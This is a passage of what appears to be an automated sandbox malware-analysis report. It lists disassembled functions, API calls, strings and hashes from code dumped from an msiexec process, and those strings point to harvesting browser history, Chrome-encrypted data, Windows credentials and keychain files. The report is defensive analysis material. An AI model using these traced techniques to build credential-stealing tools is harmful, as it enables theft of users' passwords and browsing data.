                                                                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                      • API String ID: 2263259095-3798722523
                                                                                                                                                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                      • API String ID: 2744995895-28296030
                                                                                                                                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                      • String ID: chp$v10
                                                                                                                                                      • API String ID: 4290143792-2783969131
                                                                                                                                                      • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                      • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 513 40e304-40e316 call 406e8f 511->513 517 40e476-40e483 call 406b53 513->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 513->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->513 525->510 531 40e497-40e49f free 525->531 531->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 550 40e3b0 543->550 551 40e3b3-40e3c1 wcschr 543->551 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 552 40e3fb-40e40c memcpy 549->552 553 40e40f-40e414 549->553 550->551 551->542 556 40e3c3-40e3c6 551->556 552->553 554 40e416-40e427 memcpy 553->554 555 40e42a-40e42f 553->555 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                      • API String ID: 3849927982-2252543386
                                                                                                                                                      • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                      • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 586 4093b1 574->586 587 4094ff-40950b call 443d90 574->587 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 586->589 587->568 597 40950d-409511 587->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->587 611->580 612 40929f-4092a3 611->612 612->580 614 4092a9-4092ba 612->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                                                                      • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                      • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                      • String ID: bhv
                                                                                                                                                      • API String ID: 4234240956-2689659898
                                                                                                                                                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                      • API String ID: 2941347001-70141382
                                                                                                                                                      • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                      • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 712 4467ac-4467b7 __setusermatherr 703->712 713 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->713 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 711 446755-446758 707->711 709->701 710 44673d-446745 709->710 710->711 711->703 712->713 716 446810-446819 713->716 717 44681e-446825 713->717 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2827331108-0
                                                                                                                                                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                      • String ID: visited:
                                                                                                                                                      • API String ID: 1157525455-1702587658
                                                                                                                                                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 781->783 784 40e288-40e290 free 781->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                      • free.MSVCRT ref: 0040E28B
                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                      • API String ID: 2804212203-2982631422
                                                                                                                                                      • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                      • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                                                                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 115830560-3916222277
                                                                                                                                                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
